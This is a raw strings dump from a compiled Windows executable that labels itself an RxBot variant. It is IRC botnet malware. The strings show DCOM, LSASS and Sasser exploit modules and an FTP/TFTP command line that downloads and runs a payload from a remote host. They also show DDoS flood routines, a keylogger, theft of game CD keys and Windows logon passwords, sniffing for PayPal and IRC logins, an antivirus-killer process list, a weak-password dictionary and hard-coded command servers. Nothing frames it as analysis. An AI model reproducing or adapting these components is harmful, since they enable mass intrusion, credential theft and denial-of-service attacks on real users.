!This program cannot be run in DOS mode. Rich code text rsrc SVW CjE 5P&xAg WPPV WV/t VPh@y g,lW h$jj0J SCT hH%B pnjY YY9`J s,Pzt B\Tu SDh 4R9Q`E uXR <$8%Xyl\ v^j1P S8Lk eBX5 Cvl86< U,h5R tKh R| YYW SSh pzC PSS jdP t%SW BOu u(CSV KSV VWj SVWjm YuR YYV YuY WVPS YYu SVWjm VSj h$rB VVj VPV PzC YYP hTqB SVWjm SVh SVP PzC hz@ hh~B SVW3 PzC PzC PzC PzC Yvf PzC PhT PzC PzC PzC j:uNFV >:u#FV SVW3 QPS WQPWS WWWj WWSj PSS WWWj WWj VWuBh tPhd u+Vj VWj vQW \SVW HHt YYj YYj YYj +ttHHtd NYu Wte WSP KYu tAVW QSUV WWWWj PWj t/WWUPj 0SVW PWPSS PWPSS SSV tySS t-VW QQSVW3 tUj= WVS AABBf FPF GPG rRf=Z SVW uFVVj "VVSh E VVVV t`WS WSj SVW PVh WWWW VWP WWV (null) \C$\123456111111111111111.doc FXNBFXFXNBFXFXFXFX \IPC$ \C$\123456111111111111111.doc 127.0.0.1\IPC$\ Windows 2000 2195 Windows 2000 5.0 HOD Windows 2000 2195 Windows 2000 5.0 \\192.168.1.210\IPC$ \lsarpc THT \PIPE\ \PIPE\ \PIPE\ Windows 2000 2195 Windows 2000 5.0 HOD Windows 2000 2195 Windows 2000 5.0 \\192.168.1.210\IPC$ \lsarpc THT \PIPE\ \PIPE\ \PIPE\ USERDOMAIN USERNAME wYS wBu whZ wTA wbs jHq kdz rqg LhX Qkkbal Zjz i]Wb knv owG kaE MGiI wn>Jj EEE ppxxxx (null) GAIsProcessorFeaturePresent KERNEL32 runtime error TLOSS error SING error DOMAIN error - unable to initialize heap - not enough space for lowio initialization - not enough space for stdio initialization - pure virtual function call - not enough space for _onexit/atexit table - unable to open console device - unexpected heap error - unexpected multithread lock error - not enough space for thread data abnormal program termination - not enough space for environment - not enough space for arguments - floating point not loaded Microsoft Visual C++ Runtime Library Runtime Error! Program: SunMonTueWedThuFriSat JanFebMarAprMayJunJulAugSepOctNovDec GetLastActivePopup GetActiveWindow MessageBoxA 1#QNAN 1#INF 1#IND 1#SNAN EdI MARB MEOW MEOW( MEOW Poz [%s]: FuckinG With Dcom IP: %s. [BaBeMaGnEt]: BoT 0wnaGe Complete To IP: %s \\%s\pipe\epmapper 8dcomu hx0ru EdI MARB MEOW MEOW( MEOW Poz EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE wAAAAb w[%s]: FuckinG With Dcom2 IP: %s. [TFTP]: File transfer complete to IP: %s fff WvWy Rte ZHx ZXx YZqvgff SMBr PC NETWORK PROGRAM 1.0 LANMAN1.0 Windows for Workgroups 3.1a LM1.2X002 LANMAN2.1 NT LM 0.12 SMBs NTLMSSP SMBs NTLMSSP gSW SMBu SMB SMB% SMB% SMB/ SMB% WinXP Professional [universal] lsass.exe Win2k Professional [universal] netrap.dll Win2k Advanced Server [SP4] netrap.dll echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &%s \\%s\ipc$ [%s]: FuckinG With Lsass IP: %s. ZHx ZXx YZqvgff SMBr PC NETWORK PROGRAM 1.0 LANMAN1.0 Windows for Workgroups 3.1a LM1.2X002 LANMAN2.1 NT LM 0.12 SMBs NTLMSSP SMBs NTLMSSP gSW SMBu SMB SMB% SMB% SMB/ SMB% WinXP Professional [universal] lsass.exe Win2k Professional [universal] netrap.dll Win2k Advanced Server [SP4] netrap.dll u[%s]: FuckinG With Lsass_139 IP: %s. tftp -i %s get %s&%s&exit O\70Yl qyy4 fdg qp1S %omkceg ffffcsc PMP]iVXQ bbbff pMe gfff` Muuu xw2k SP4 many wXP SP1 most others wXP SP1 many Exploiting [%s] on %s... PORT PASS x USER x lUB TUB xTB dTB PTB lSB TSB xRB DQB tPB DPB pOB TOB tNB XNB dMB HMB hLB LLB AAAA pKB XKB Win2K SP0 From PhaTTy 1 Win2K SP1 From PhaTTy 2 Win2K SP2 From PhaTTy 1 Win2K SP3 From PhaTTy 1 Win2K SP4 From PhaTTy 3 Win2K SP4 From PhaTTy 2 Win2K SP1 From PhaTTy 1 Win2K SP4 From PhaTTy 1 DoS XP ALL Windows uk 2k3 ee sp0 24 Windows uk 2k3 ee sp0 23 Windows uk 2k3 ee sp0 22 Windows uk 2k3 ee sp0 21 Windows uk 2k3 ee sp0 20 Windows uk 2k3 ee sp0 19 Windows uk 2k3 ee sp0 18 Windows uk 2k3 ee sp0 17 Windows uk 2k3 ee sp0 16 Windows uk 2k3 ee sp0 15 Windows uk 2k3 ee sp0 14 Windows uk 2k3 ee sp0 13 Windows uk 2k3 ee sp0 12 Windows uk 2k3 ee sp0 11 Windows uk 2k3 ee sp0 10 Windows uk 2k3 ee sp0 9 Windows uk 2k3 ee sp0 8 Windows uk 2k3 ee sp0 7 Windows uk 2k3 ee sp0 6 Windows uk 2k3 ee sp0 5 Windows uk 2k3 ee sp0 4 Windows uk 2k3 ee sp0 3 Windows uk 2k3 ee sp0 2 Windows uk 2k3 ee sp0 1 Windows uk 2k3 se sp0 24 Windows uk 2k3 se sp0 23 Windows uk 2k3 se sp0 22 Windows uk 2k3 se sp0 21 Windows uk 2k3 se sp0 20 Windows uk 2k3 se sp0 19 Windows uk 2k3 se sp0 18 Windows uk 2k3 se sp0 17 Windows uk 2k3 se sp0 16 Windows uk 2k3 se sp0 15 Windows uk 2k3 se sp0 14 Windows uk 2k3 se sp0 13 Windows uk 2k3 se sp0 12 Windows uk 2k3 se sp0 11 Windows uk 2k3 se sp0 10 Windows uk 2k3 se sp0 9 Windows uk 2k3 se sp0 8 Windows uk 2k3 se sp0 7 Windows uk 2k3 se sp0 6 Windows uk 2k3 se sp0 5 Windows uk 2k3 se sp0 4 Windows uk 2k3 se sp0 3 Windows uk 2k3 se sp0 2 Windows uk 2k3 se sp0 1 Windows uk xp pro sp1 25 Windows uk xp pro sp1 24 Windows uk xp pro sp1 23 Windows uk xp pro sp1 22 Windows uk xp pro sp1 21 Windows uk xp pro sp1 20 Windows uk xp pro sp1 19 Windows uk xp pro sp1 18 Windows uk xp pro sp1 17 Windows uk xp pro sp1 16 Windows uk xp pro sp1 15 Windows uk xp pro sp1 14 Windows uk xp pro sp1 13 Windows uk xp pro sp1 12 Windows uk xp pro sp1 11 Windows uk xp pro sp1 10 Windows uk xp pro sp1 9 Windows uk xp pro sp1 8 Windows uk xp pro sp1 7 Windows uk xp pro sp1 6 Windows uk xp pro sp1 5 Windows uk xp pro sp1 4 Windows uk xp pro sp1 3 Windows uk xp pro sp1 2 Windows uk xp pro sp1 1 Windows 2000 SP4 GER FAT32 Windows nl sp1 23 Windows nl sp1 22 Windows nl sp1 21 Windows nl sp1 20 Windows nl sp1 19 Windows nl sp1 18 Windows nl sp1 17 Windows nl sp1 16 Windows nl sp1 15 Windows nl sp1 14 Windows nl sp1 13 Windows nl sp1 12 Windows nl sp1 11 Windows nl sp1 10 Windows nl sp1 9 Windows nl sp1 8 Windows nl sp1 7 Windows nl sp1 6 Windows nl sp1 5 Windows nl sp1 4 Windows nl sp1 3 Windows nl sp1 2 Windows nl sp1 1 Windows XP SP0+1 ENG Windows XP SP0+1 GER+NL+IT+FR \\%s\pipe\wkssvc d-dcom D-Dcom dcom135 Dcom135 dcom445 Dcom445 magz MaGz wkssvcENG WKSSVC_Eng wkssvcOth WKSSVC_Other lsass_139 lsass_139 dcass Dcass dcom2k135 Dcom2k135 dcom2k445 Dcom2k445 sasser sasser5554 sasser Sasser1023 realcast Realcast babez BaBeZ dcass babez ZHx ZXx YZqbgff Total: %d in %s. [SCAN]: Exploit Statistics: [SCAN]: Scan not active. [SCAN]: Current IP: %s. [HTTPD]: Failed to start server, error: <%d>. [HTTPD]: Server listening on IP: %s:%d, Directory: %s\. [FTP]: Failed to start server, error: <%d>. [FTP]: Server started on Port: %d, File: %s, Request: %s. [TFTP]: Failed to start server, error: <%d>. [TFTP]: Server started on Port: %d, File: %s, Request: %s. %d.%d.%d.%d [SCAN]: IP: %s, Port %d is open. [SCAN]: IP: %s:%d, Scan thread: %d, Sub-thread: %d. [SCAN]: Finished at %s:%d after %d minute(s) of scanning. [SCAN]: Failed to start worker thread, error: <%d>. [SCAN]: %s:%d, Scan thread: %d, Sub-thread: %d. [SCAN]: Failed to initialize critical section. %d. %s = %s -[Alias List]- [%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s [LOGS]: Cleared. [LOG]: List complete. [LOG]: Begin DISPLAY Window ppB hpB PpB xoB doB PoB hpB tnB hpB hpB hpB pmB XlB DkB ljB thB lhB LhB HgB hpB peB heB DeB heB heB heB tdB lcB LcB lcB lcB Key3= Neverwinter Nights (Hordes of the Underdark) Key2= Neverwinter Nights (Shadows of Undrentide) Key1= nwncdkey.ini Neverwinter Nights Location Software\BioWare\NWN\Neverwinter mtkwftmkemfew3p3b7 base\mp\sof2key Soldier of Fortune II - Double Helix InstallPath Software\Activision\Soldier of Fortune II - Double Helix Hidden & Dangerous 2 key Software\Illusion Softworks\Hidden & Dangerous 2 Chrome SerialNumber Software\Techland\Chrome NOX Software\Westwood\NOX Command and Conquer: Red Alert 2 Software\Westwood\Red Alert 2 Command and Conquer: Red Alert Software\Westwood\Red Alert Command and Conquer: Tiberian Sun Serial Software\Westwood\Tiberian Sun Rainbow Six III RavenShield Software\Red Storm Entertainment\RAVENSHIELD Nascar Racing 2003 Software\Electronic Arts\EA Sports\Nascar Racing 2003\ergc Nascar Racing 2002 Software\Electronic Arts\EA Sports\Nascar Racing 2002\ergc NHL 2003 Software\Electronic Arts\EA Sports\NHL 2003\ergc NHL 2002 Software\Electronic Arts\EA Sports\NHL 2002\ergc FIFA 2003 Software\Electronic Arts\EA Sports\FIFA 2003\ergc FIFA 2002 Software\Electronic Arts\EA Sports\FIFA 2002\ergc Shogun: Total War: Warlord Edition Software\Electronic Arts\EA GAMES\Shogun Total War - Warlord Edition\ergc Need For Speed: Underground Software\Electronic Arts\EA GAMES\Need For Speed Underground\ergc Need For Speed Hot Pursuit 2 ergc Software\Electronic Arts\EA GAMES\Need For Speed Hot Pursuit 2 Medal of Honor: Allied Assault: Spearhead Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault Spearhead\ergc Medal of Honor: Allied Assault: Breakthrough Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault Breakthrough\ergc Medal of Honor: Allied Assault Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault\ergc Global Operations Software\Electronic Arts\EA GAMES\Global Operations\ergc Command and Conquer: Generals Software\Electronic Arts\EA GAMES\Generals\ergc James Bond 007: Nightfire Software\Electronic Arts\EA GAMES\James Bond 007 Nightfire\ergc Command and Conquer: Generals (Zero Hour) Software\Electronic Arts\EA GAMES\Command and Conquer Generals Zero Hour\ergc Black and White Software\Electronic Arts\EA GAMES\Black and White\ergc Battlefield Vietnam Software\Electronic Arts\EA GAMES\Battlefield Vietnam\ergc Battlefield 1942 (Secret Weapons of WWII) Software\Electronic Arts\EA GAMES\Battlefield 1942 Secret Weapons of WWII\ergc Battlefield 1942 (Road To Rome) Software\Electronic Arts\EA GAMES\Battlefield 1942 The Road to Rome\ergc Battlefield 1942 Software\Electronic Arts\EA GAMES\Battlefield 1942\ergc Freedom Force Software\Electronic Arts\EA Distribution\Freedom Force\ergc IGI 2: Covert Strike Software\IGI 2 Retail Unreal Tournament 2004 Software\Unreal Technology\Installed Apps\UT2004 Unreal Tournament 2003 Software\Unreal Technology\Installed Apps\UT2003 Microsoft Windows Product ID ProductId Software\Microsoft\Windows\CurrentVersion Soldiers Of Anarchy Software\Silver Style Entertainment\Soldiers Of Anarchy\Settings Legends of Might and Magic CustomerNumber Software\3d0\Status Industry Giant 2 prvkey Software\JoWooD\InstalledGames\IG2 Half-Life Software\Valve\Half-Life\Settings Gunman Chronicles Key Software\Valve\Gunman\Settings The Gladiators RegNumber Software\Eugen Systems\The Gladiators Counter-Strike (Retail) CDKey Software\Valve\CounterStrike\Settings %s CD Key: (%s). [DCC]: Failed to send to Remote command shell. [DCC]: Failed to open remote command shell. [DCC]: Failed to open socket. [DCC]: Socket error. [DCC]: Transfer complete to IP: %s, Filename: %s (%s bytes). [DCC]: Unable to open socket. [DCC]: Send timeout. DCC SEND %s %i %i %i [DCC]: File doesn't exist. [DCC]: Failed to bind to socket. [DCC]: Failed to create socket. [DCC]: Transfer complete from IP: %s, Filename: %s (%s bytes). [DCC]: Error opening socket. [DCC]: Error opening file for writing. [DCC]: Error unable to write file to disk. [DDoS]: Done with flood (%iKB/sec). [DDoS]: Send error: <%d>. ddos.random ddos.ack ddos.syn [DOWNLOAD]: Bad URL, or DNS Error: %s. [DOWNLOAD]: Update failed: Error executing file: %s. [DOWNLOAD]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating. [DOWNLOAD]: Opened: %s. open [DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec. [DOWNLOAD]: CRC Failed (%d != %d). [DOWNLOAD]: Filesize is incorrect: (%d != %d). [DOWNLOAD]: Update: %s (%dKB transferred). [DOWNLOAD]: File download: %s (%dKB transferred). [DOWNLOAD]: Couldn't open file: %s. Unknown Invalid Disk Network Cdrom RAM failed %sKB [MAIN]: %s Drive (%s): %s total, %s free, %s available. [MAIN]: %s Drive (%s): Failed to stat, device not ready. [FINDFILE]: Files found: %d. [FINDFILE]: Searching for file: %s. Found: %s\%s [FINDPASS]: Failed to enable Debug Privilege. [FINDPASS]: Unable to find Winlogon Process ID. [FINDPASS]: Unable to find the password in memory. [FINDPASS]: The Windows logon (Pid: <%d>) information is: Domain: \\%S, User: (%S/(no password)). RtlRunDecodeUnicodeString RtlDestroyQueryDebugBuffer RtlQueryProcessDebugInformation RtlCreateQueryDebugBuffer NtQuerySystemInformation NTDLL.DLL SeDebugPrivilege [FINDPASS]: Only supported on Windows NT/2000. MSGINA NWGINA WINLOGON [FINDPASS]: The Windows logon (Pid: <%d>) information is: Domain: \\%S, User: (%S/%S). [FINDPASS]: The Windows logon (Pid: <%d>) information is: Domain: \\%S, User: (%S/(N/A)). 221 Goodbye happy r00ting. QUIT 425 Can't open data connection. [FTP]: File transfer complete to IP: %s (%s). 226 Transfer complete. 150 Opening BINARY mode data connection RETR 200 PORT command successful. %s.%s.%s.%s PORT 226 Transfer complete LIST 425 Passive not supported on this server PASV 200 Type set to I. 200 Type set to A. TYPE 257 "/" is current directory. PWD 350 Restarting. REST 215 StnyFtpd SYST 230 User logged in. PASS 331 Password required USER 220 StnyFtpd 0wns j0 [HTTPD]: Error: server failed, returned: <%d>. GET HTTP/1.0 200 OK Server: myBot Cache-Control: no-cache,no-store,max-age=0 pragma: no-cache Content-Type: %s Content-Length: %i Accept-Ranges: bytes Date: %s %s GMT Last-Modified: %s %s GMT Expires: %s %s GMT Connection: close HTTP/1.0 200 OK Server: myBot Cache-Control: no-cache,no-store,max-age=0 pragma: no-cache Content-Type: %s Accept-Ranges: bytes Date: %s %s GMT Last-Modified: %s %s GMT Expires: %s %s GMT Connection: close HH:mm:ss ddd, dd MMM yyyy application/octet-stream text/html [HTTPD]: Failed to start worker thread, error: <%d>. [HTTPD]: Worker thread of server thread: %d. Found: %i Files and %i Directories

PRIVMSG %s :Found %s Files and %s Directories %-31s %-21s (%i bytes) %s %dk ">%s ">%.30s> PRIVMSG %s :%-31s %-21s (%s bytes) %s - ">%s/ ">%.29s>/ Parent Directory Searching for: %s

Name Last Modified Size

Index of %s

Index of %s PRIVMSG %s :Searching for: %s [ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB). [ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>. [ICMP]: Invalid target IP. [ICMP]: Error: setsockopt() failed, returned: <%d>. [ICMP]: Error: socket() failed, returned: <%d>. %s %s :%s PRIVMSG NOTICE [ESC] [ESC] [TAB] [TAB] [CTRL] [CTRL] [WIN] [WIN] [WIN] [WIN] [PRSC] [PRSC] [SCLK] [SCLK] [INS] [INS] [HOME] [HOME] [PGUP] [PGUP] [DEL] [DEL] [END] [END] [PGDN] [PGDN] [LEFT] [LEFT] [RGHT] [RGHT] [DOWN] [DOWN] [NMLK] [NMLK] [KEYLOG]: %s [%d-%d-%d %d:%d:%d] %s %s (Return) (%s) %s (Buffer full) (%s) %s (Changed Windows: %s) capGetDriverDescriptionA capCreateCaptureWindowA avicap32.dll SQLDisconnect SQLFreeHandle SQLAllocHandle SQLExecDirect SQLSetEnvAttr SQLDriverConnect odbc32.dll SHChangeNotify ShellExecuteA shell32.dll WNetCancelConnection2W WNetCancelConnection2A WNetAddConnection2W WNetAddConnection2A mpr.dll DeleteIpNetEntry GetIpNetTable iphlpapi.dll DnsFlushResolverCacheEntry_A DnsFlushResolverCache dnsapi.dll NetMessageBufferSend NetUserGetInfo NetUserEnum NetUserDel NetUserAdd NetRemoteTOD NetApiBufferFree NetScheduleJobAdd NetShareEnum NetShareDel NetShareAdd netapi32.dll IcmpSendEcho IcmpCloseHandle IcmpCreateFile icmp.dll Mozilla/4.0 (compatible) InternetCloseHandle InternetReadFile InternetCrackUrlA InternetOpenUrlA InternetOpenA InternetConnectA HttpSendRequestA HttpOpenRequestA InternetGetConnectedStateEx InternetGetConnectedState wininet.dll closesocket getpeername gethostbyaddr gethostbyname gethostname getsockname setsockopt accept listen select bind recvfrom recv sendto send ntohl ntohs htonl htons inet_addr inet_ntoa connect ioctlsocket socket WSACleanup WSAGetLastError WSAIoctl __WSAFDIsSet WSAAsyncSelect WSASocketA WSAStartup ws2_32.dll DeleteObject DeleteDC BitBlt SelectObject GetDIBColorTable GetDeviceCaps CreateCompatibleDC CreateDIBSection CreateDCA gdi32.dll GetUserNameA IsValidSecurityDescriptor EnumServicesStatusA CloseServiceHandle DeleteService ControlService StartServiceA OpenServiceA OpenSCManagerA AdjustTokenPrivileges LookupPrivilegeValueA OpenProcessToken RegCloseKey RegDeleteValueA RegQueryValueExA RegSetValueExA RegCreateKeyExA RegOpenKeyExA advapi32.dll GetForegroundWindow GetWindowTextA GetKeyState GetAsyncKeyState ExitWindowsEx CloseClipboard GetClipboardData OpenClipboard DestroyWindow IsWindow FindWindowA SendMessageA user32.dll RegisterServiceProcess QueryPerformanceFrequency QueryPerformanceCounter SearchPathA GetDriveTypeA GetLogicalDriveStringsA GetDiskFreeSpaceExA Module32First Process32Next Process32First CreateToolhelp32Snapshot SetErrorMode kernel32.dll [MAIN]: DLL test complete. Avicap32.dll failed. <%d> Odbc32.dll failed. <%d> Shell32.dll failed. <%d> Mpr32.dll failed. <%d> Iphlpapi.dll failed. <%d> Dnsapi.dll failed. <%d> Netapi32.dll failed. <%d> Icmp.dll failed. <%d> Wininet.dll failed. <%d> Ws2_32.dll failed. <%d> Gdi32.dll failed. <%d> Advapi32.dll failed. <%d> User32.dll failed. <%d> Kernel32.dll failed. <%d> %s Error: %s <%d>. mIRC explorer.exe SeShutdownPrivilege %%comspec%% /c %s %s @echo off :repeat del "%%1" if exist "%%1" goto repeat del "%s" %sdel.bat Continued Continue Paused Pause Stopped Stop Started Start Listed List Deleted Delete Added Add [NET]: %s: No service specified. [NET]: Error with service: '%s'. %s [NET]: %s service: '%s'. An unknown error occurred: <%ld> The system is shutting down. The service has not been started. The requested control code cannot be sent to the service because the state of the service. The service has been marked for deletion. The service could not be logged on. The account does not have the correct access rights. The specified service does not exist. The service has been disabled. The service depends on another service that has failed to start. The service depends on a service that does not exist or has been marked for deletion. The specified database does not exist. An instance of the service is already running. The requested control code is not valid, or it is unacceptable to the service. The process for the service was started, but it did not call StartServiceCtrlDispatcher. A thread could not be created for the service. The database is locked. The service cannot be stopped because other running services are dependent on it. The service binary file could not be found. The handle does not have the required access right. The handle is invalid. The requested control code is undefined. The specified service name is invalid. %s: %s (%s) Stopped Starting Stoping Running Continuing Pausing Paused Unknown The following Windows services are registered: [NET]: %s: No share specified. [NET]: %s share: '%s'. [NET]: %s: Error with share: '%s'. %s %-14S %-24S %-6u %-4s Yes [NET]: Share list error: %s <%ld> Share name: Resource: Uses: Desc: [NET]: %s: No username specified. [NET]: %s: Error with username: '%s'. %s [NET]: %s username: '%s'. [NET]: User info error: <%ld> Units Per Week: %d Max. Storage: %d User's Language: %d Country Code: %d Workstations: %S Logon Server: %S Last Logoff: %d Last Logon: %d Number of Logins: %d Bad Password Count: %d Password Age: %d Parameters: %S Home Directory: %S Auth Flags: %d Privilege Level: %s Guest User Administrator Comment: %S User Comment: %S Full Name: %S Account: %S Total users found: %d. [NET]: An access violation has occured. [NET]: User list error: %s <%ld> Username accounts for local system: Network connection not found. The user name could not be found. Share not found. The computer name is invalid. An unknown error occurred. The password is shorter than required (or does not meet the password policy requirement.) The group already exists. The user account already exists. The operation is allowed only on the primary domain controller of the domain. A general failure occurred in the network hardware. Level parameter is invalid. Device or directory does not exist. Invalid for redirected resource. Duplicate share name. The name is invalid. Access denied. Not enough memory. This network request is not supported. Server name not found. Invalid parameter. [NET]: %s [NET]: Message sent successfully. [FLUSHDNS]: Not supported by this system. [FLUSHDNS]: Unable to allocation ARP cache. [FLUSHDNS]: ARP cache is empty. [FLUSHDNS]: Error getting ARP cache: <%d>. [PING]: Finished sending pings to %s. [PING]: Error sending pings to %s. [UDP]: Finished sending packets to %s. [UDP]: Error sending pings to %s. i11r54n4.exe irun4.exe d3dupdate.exe rate.exe ssate.exe winsys.exe winupd.exe SysMonXP.exe bbeagle.exe Penis32.exe teekids.exe MSBLAST.exe mscvb32.exe sysinfo.exe PandaAVEngine.exe wincfg32.exetaskmon.exe zonealarm.exe navapw32.exe navw32.exe zapro.exe msblast.exe netstat.exe msconfig.exe regedit.exe [PROC]: Process list failed. [PROC]: Process list completed. [PROC]: Listing processes: :.login :,login :!login :@login :$login :%login :^login :&login :*login :-login :+login :/login :\login :=login :?login :'login :`login :~login : login :.auth :,auth :!auth :@auth :$auth :%auth :^auth :&auth :*auth :-auth :+auth :/auth :\auth :=auth :?auth :'auth :`auth :~auth : auth :.hashin :!hashin :$hashin :%hashin :.secure :!secure :.syn :!syn :$syn :%syn CDKey JOIN # NICK OPER oper now an IRC Operator USER PASS paypal PAYPAL paypal.com PAYPAL.COM Set-Cookie: HTTP FTP IRC BOT [PSNIFF]: Error: recv() failed, returned: <%d> [PSNIFF]: Suspicious %s packet from: %s:%d - %s. [PSNIFF] [PSNIFF]: Error: WSAIoctl() failed, returned: <%d>. [PSNIFF]: Error: bind() failed, returned: <%d>. [PSNIFF]: Error: socket() failed, returned: <%d>. InFeRq-BaBeZ [RxBoT.IFS-Priv.V.0.2.1 BaBeZ-MASS] sexyslut101 infer.battoun2ouja3.net sexy #inferq haha users.of-chaos.com #inferq haha tellecom.exe telcom.txt Microsoft Telecom Center [InFeR]- config.dat #exp #sniff #key Software\Microsoft\Windows\CurrentVersion\Run Software\Microsoft\Windows\CurrentVersion\RunServices Software\Microsoft\OLE SYSTEM\CurrentControlSet\Control\Lsa james bond worf picard kirk b0n3s b0nes bones scotty spock klingon defaultpass ncc1701e ncc1701d ncc1701c ncc1701b ncc1701a ncc1701 startrek ferret intranet lan main winpass blank office control nokia siemens compaq dell cisco ibm orainstall sqlpassoainstall sql databasepassword data databasepass dbpassword dbpass access domainpassword domainpass domain hello hell god sex slut bitch fuck exchange backup technical loginpass login mary qwe zxc asd qaz win2000 winnt winxp win2k win98 windows oeminstall oemuser oem user homeuser home accounting accounts internet www web outlook mail qwerty null server system changeme linux unix demo none test pwd pass pass1234 passwd password password1 adm wiredwesel weiredweasel psycorats psycoratsonacid shaz maryjim katie kate george eric chris ian neil lee brian susan sue sam luke peter john mike bill fred joe jen bob oracle dba database default guest wwwadmin teacher student owner computer root staff admin admins administrat administrateur administrador administrator JPilot IRC Java Client 2.32 Eggdrop 1.3.24i (c)1997 Robey Pointer Ircle 3.0b10 US PPC 12/15/1997 21:07:34 PM. #239C23AF21B Quarterdeck Global Chat 1.2.9 for Macintosh AmIRC/AmigaOS 2.0.4 by Oliver Wagner : http://www.vapor.com/ : [#0000D63F] : The slow mess client xircon[b4] + doot.3b[pawt] be-two + anony(v1) + aolsay(impulse) + deepthought + saq(dbg) osiris-1c/bitchx-75p1 + autobot(bx) p3x3 : that time then and once again.. ircN 7.0rc.6 + 7.0rc.5 + 7.0rc.4 for mIRC - the devils of truth steal the souls of the free - ircN 6.03 for mIRC - are we being punished for fate - WSIRC 2.03-R - CopyRight 1994, 1995 Caesar M Samsi csamsi@clark.net TEXT CHANNEL HydraIRC v0.3.133-Test (14/March/2004) by Dominic Clifton aka Hydra - #HydraIRC on EFNet C++ based IRC Client by Jumpincow/shaxxxa/mo00 StormBot.TCL 3.1.beta.2.10 by Xone & Domino (coders@stormbot.org) eggdrop v1.6.13 eggdrop v1.6.15 mIRC32 v1.0 K .Mardam-Bey mIRC v6.14 K.Mardam-Bey mIRC v6.12 K.Mardam-Bey mIRC v6.10 K.Mardam-Bey mIRC v6.1 K.Mardam-Bey mIRC v6.03 K.Mardam-Bey mIRC v6.01 K.Mardam-Bey mIRC v5.82 K.Mardam-Bey mIRC v5.71 K.Mardam-Bey mIRC32 v6.12 K.Mardam-Bey mIRC32 v6.03 K.Mardam-Bey mIRC32 v6.01 K.Mardam-Bey mIRC32 v5.82 K.Mardam-Bey mIRC32 v5.71 K.Mardam-Bey irssi v0.8.4 - running on Linux i686 ircN 7.27 + 7.0 - everyone i know goes away in the end - xchat 1.8.10 Linux 2.4.25p1mp [i686/501MHz] ircII 2.9_base OSF1 V4.0 :ircii 2.8: almost there... ircII 2.8.2 SunOS 5.6 :ircii 2.8: almost there... ircII 2.9-BitchX-60 Linux 1.2.8 :bitZ%summer '96(bitX%summer'96) ircII EPIC4pre2 SunOS 5.6 - cypher(beta\one) -myd!nas :one step closer to world domination ircII EPIC4pre2 Linux 2.0.34 - Accept no limitations. [bx.75p1] linux 2.0.36 [embryonic.22b3] :what is this that stands before me BitchX-1.0c18+ by panasync - IRIX 6.5.10 Silicon Graphics : Keep it to yourself! BitchX-74p2+1.3f/SunOS 5.6 :(c)rackrock/bX [3.0.1?8] : Keep it to yourself! BitchX-1.0c19+ by panasync - FreeBSD 4.10-BETA : Keep it to yourself! BitchX-70alpha14+tcl by panasync - Linux 2.0.27 Keep it to yourself! ..(argon/1g) :bitchx-75 : Keep it to yourself! BitchX-74p2+ by panasync - CYGWIN32/95 4.0 : Keep it to yourself! mIRC v6.03 Khaled Mardam-Bey mIRC v6.12 Khaled Mardam-Bey sexyInFeR@staff.dalnet [AUTO_SCAN] %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads. Random ntpass [SCAN] Already %d scanning threads. Too many specified. [SECURE]: Failed to start registry thread, error: <%d>. [SECURE]: Registry monitor active. [SECURE]: Failed to start secure thread, error: <%d>. [SECURE]: System secure monitor active. [PROCS]: Failed to start AV/FW killer thread, error: <%d>. [PROCS]: AV/FW Killer active. [MAIN]: Bot started. %s %d "%s" [MAIN]: Connected to %s. NICK %s USER %s 0 0 :%s PASS %s MODE %s %s USERHOST %s [MAIN]: User: %s logged in. [MAIN]: Password accepted. [MAIN]: *Failed host auth by: (%s!%s). NOTICE %s :Host Auth failed (%s!%s). [MAIN]: *Failed pass auth by: (%s!%s). NOTICE %s :Your attempt has been logged. NOTICE %s :Pass auth failed (%s!%s). [MAIN]: Random nick change: %s [MAIN]: Invalid login slot number: %d. [MAIN]: No user logged in at slot: %d. [MAIN]: %s [SECURE]: %s system. Unsecuring Securing [FINDFILE] Find file [PROC] Process list [MAIN]: Reconnecting. QUIT :reconnecting [MAIN]: Disconnecting. QUIT :disconnecting QUIT :%s [MAIN]: Status: Ready. Bot Uptime: %s. [MAIN]: Bot ID: %s. [THREADS]: Failed to start list thread, error: <%d>. [THREADS]: List threads. sub [MAIN]: Alias list. [LOG]: Failed to start listing thread, error: <%d>. [LOG]: Listing log. [MAIN]: Network Info. [MAIN]: System Info. [MAIN]: Removing Bot. [PROCS]: Failed to start listing thread, error: <%d>. [PROCS]: Proccess list. full [PROC]: Already running. [CDKEYS]: Search completed. [MAIN]: Uptime: %s. [CMD]: Remote shell ready. [CMD]: Couldn't open remote shell. [CMD]: Remote shell already running. [MAIN]: Get Clipboard. -[Clipboard Data]- [FLUSHDNS]: Failed to flush ARP cache. [FLUSHDNS]: ARP cache flushed. [FLUSHDNS]: Failed to load dnsapi.dll. [FLUSHDNS]: Failed to flush DNS cache. [FLUSHDNS]: DNS cache flushed. [RLOGIND]: Failed to start server thread, error: <%d>. [RLOGIND]: Server listening on IP: %s:%d, Username: %s. [HTTPD]: Failed to start server thread, error: 